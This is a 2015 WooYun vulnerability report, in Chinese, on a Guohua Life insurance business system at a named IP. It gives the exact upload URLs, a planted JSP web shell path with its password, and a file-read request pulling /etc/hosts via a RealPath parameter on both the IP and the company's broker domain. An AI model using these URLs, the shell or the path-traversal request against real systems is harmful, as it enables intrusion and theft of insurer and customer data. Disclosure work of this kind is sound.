漏洞概要
关注数(24)
关注此漏洞
漏洞标题:国华人寿某业务系统漏洞打包
提交时间:2015-07-11 10:09
修复时间:2015-07-16 10:10
公开时间:2015-07-16 10:10
漏洞类型:文件上传导致任意代码执行
危害等级:高
自评Rank:20
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
Tags标签:
无
漏洞详情
披露状态:
2015-07-11: 细节已通知厂商并且等待厂商处理中
2015-07-16: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
任意文件上传+任意文件下载漏洞
详细说明:
寿险业务系统
http://59.151.39.85/pre/
1#任意文件上传
在扫描该系统的时候,我发现了一个url
http://59.151.39.85/pre/upload/default.htm
点进去好像还可以上传
http://59.151.39.85/pre/upload/sample1.htm
上传成功,但坑爹的是没有回显
自己尝试了一下,发现就在当前上传目录
http://59.151.39.85/pre/upload/wooyun.jpg
然后,我试了一下直接上传jsp
http://59.151.39.85/pre/upload/01.jsp
密码:woo9yun
成功连接
漏洞证明:
2#任意文件下载
与我之前提交的漏洞 WooYun: 国华人寿某系统存在任意文件下载漏洞 同一套系统,但不同ip
比如
http://59.151.39.85/pre/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/hosts
显示的是
而http://broker.guohualife.com/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/hosts显示的是
所以没有重复哈
修复方案:
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-07-16 10:10
厂商回复:
漏洞Rank:15 (WooYun评价)
最新状态:
暂无